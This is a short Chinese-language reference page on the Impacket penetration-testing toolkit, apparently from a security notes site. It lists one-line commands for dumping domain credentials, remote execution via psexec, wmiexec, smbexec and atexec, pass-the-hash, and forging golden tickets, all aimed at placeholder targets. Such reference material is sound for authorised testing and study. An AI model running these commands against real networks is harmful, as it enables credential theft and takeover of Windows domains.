---
title: "Impacket"
weight: 50
description: "远程执行工具集"
date: "2026-03-24T16:29:46+08:00"
lastmod: "2026-03-24T16:29:46+08:00"
---

## Impacket

Impacket 是一组 Python 工具集，用于网络协议操作和远程执行，广泛用于渗透测试。

## 基础使用

### secretsdump - 凭证转储
```bash
secretsdump.py domain/user:pass@target.com
```

### psexec - 远程执行
```bash
psexec.py domain/user:pass@target.com
```

### wmiexec - WMI 远程执行
```bash
wmiexec.py domain/user:pass@target.com
```

### smbexec - SMB 远程执行
```bash
smbexec.py domain/user:pass@target.com
```

### atexec - 计划任务执行
```bash
atexec.py domain/user:pass@target.com
```

## 常用工具

| 工具 | 描述 |
|------|------|
| secretsdump.py | 凭证转储 |
| psexec.py | PSExec 远程执行 |
| wmiexec.py | WMI 远程执行 |
| smbexec.py | SMB 远程执行 |
| atexec.py | 计划任务执行 |
| ticketer.py | Kerberos 票据伪造 |
| goldenPac.py | 黄金票据攻击 |
| getTGT.py | 获取 TGT 票据 |
| getST.py | 获取 ST 票据 |
| lookupsid.py | SID 枚举 |

## 功能特性

- **远程执行** - 多种远程执行方式
- **凭证转储** - 提取域凭证
- **Kerberos 攻击** - 票据攻击支持
- **协议支持** - SMB、MSRPC、WMI 等

## 使用示例

```bash
# 使用哈希传递
psexec.py -hashes :HASH domain/user@target.com

# 转储域控制器
secretsdump.py domain/dc$@dc.target.com

# 创建黄金票据
ticketer.py -nthash HASH -domain-sid SID domain.com

# 枚举用户
lookupsid.py domain/user:pass@target.com
```

## 参考资源

- [Impacket GitHub](https://github.com/SecureAuthCorp/impacket)